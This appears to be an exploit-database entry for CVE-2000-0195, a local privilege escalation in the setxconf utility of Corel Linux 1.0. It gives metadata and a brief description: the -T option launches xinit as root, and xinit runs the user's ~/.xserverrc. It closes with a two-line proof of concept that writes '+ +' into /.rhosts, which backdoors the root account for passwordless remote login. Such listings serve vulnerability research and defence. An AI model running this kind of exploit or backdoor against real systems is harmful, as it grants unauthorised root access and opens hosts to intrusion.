Corel Linux OS 1.0 - 'setxconf' Local Privilege Escalation

Author: suid
type: local
platform: linux
port: 
date_added: 2000-02-24 
date_updated: 2017-11-22 
verified: 1 
codes: CVE-2000-0195;OSVDB-1231 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/1008/info

A vulnerability exists in the setxconf utility, as shipped with Corel Linux 1.0. The -T option to setxconf will run xinit, which euid root. xinit, when executed, will invoke the contents on ~/.xserverrc. A malicious user could therefore execute commands as root.

cat > ~/.xserverrc
echo "+ +" > /.rhosts